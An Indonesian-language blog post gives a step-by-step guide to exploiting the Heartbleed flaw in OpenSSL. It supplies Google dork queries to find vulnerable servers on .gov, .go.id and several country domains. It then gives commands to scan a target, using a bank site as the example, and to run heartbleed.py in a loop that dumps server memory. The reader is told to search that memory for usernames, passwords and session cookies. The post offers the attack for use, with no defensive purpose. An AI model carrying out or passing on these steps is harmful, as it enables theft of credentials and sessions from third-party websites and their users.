Hacking With Heartbleed For WIndows
Friday 3 July 2015
Add Comment
2. Extract Tools, Setelah itu Simpan Di Drive C
3. Temukan Target Dengan Google Dork :
"OpenSSL" AND "1.0.1 Server at" OR "1.0.1a Server at" OR "1.0.1b Server
at" OR "1.0.1c Server at" OR "1.0.1d Server at" OR "1.0.1e Server at" OR
"1.0.1f Server "
inurl:"https://" site:cn
inurl:"https://" site:il
inurl:"https://" site:my
inurl:"https://" site:au
inurl:"https://" site:gov
inurl:"https://" site:go.id
4. SCAN TARGET
Buka Coonsole, masukan:
"python ssltest.py <target>"
Contoh:
"python ssltest.py www.bank*.com"
jika website vulnerability..
5. (a). FIND USER AND PASS
Buka console, masukan:
"python pacemaker.py"
Biarkan..
Buka COnsole baru, masukan:
"python heartbleed.py <target> -x 4"
sekarang agan hanya perlu mencari 'private' user dan pass website tersebut
6. (b) FIND COOKIE-SESSIONS
Buka console, Masukan:
"python pacemaker.py"
biarkan..
Buka console baru, masukan:
"while true; do python heartbleed.py <target> >> /root/out1 ; sleep 5; done"
biarkan..
Buka console baru, masukan:
"tail -f /root/out1"
Sekarang anda hanya perlu mencari cookie-sessions website tersebut.
Note:
untuk memudahkan anda mencari, klik 'Search' pada menu bar console
-> 'Find' dan ketikan 'user' atau 'cookie' pada kotak find
Inilah Bahaya Celah Heartbleed :
http://bit.ly/1NA8Fju
0 Response to "Hacking With Heartbleed For WIndows"
Post a Comment